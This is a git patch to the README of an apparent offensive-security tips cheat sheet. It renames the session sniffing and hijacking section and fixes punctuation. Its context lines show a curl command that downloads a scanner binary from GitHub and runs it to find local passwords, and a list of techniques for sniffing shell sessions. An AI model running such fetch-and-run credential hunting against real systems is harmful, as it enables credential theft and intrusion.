From 150f1dd3b8be85e68dc06d097a0d8ecc80f6b1f4 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 30 Apr 2024 17:15:07 +0100 Subject: [PATCH] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index b928df7..5b0eb2f 100644 --- a/README.md +++ b/README.md @@ -90,7 +90,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [SSH session sniffing and hijacking](#ssh-sniffing) +1. [Session sniffing and hijacking](#sniffing) 1. [Sniff a user's SHELL session](#session-sniffing) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 2. [Sniff all SHELL sessions with eBPF](#bpf) @@ -1675,7 +1675,7 @@ wfind() { # Usage: wfind /etc /var /usr ``` -Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker): +Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)): ```sh curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static ./np scan . && \ @@ -1883,8 +1883,8 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. ``` --- - -## 10. SSH Sniffing + +## 10. Session sniffing and hijaking **10.i Sniff a user's SHELL session**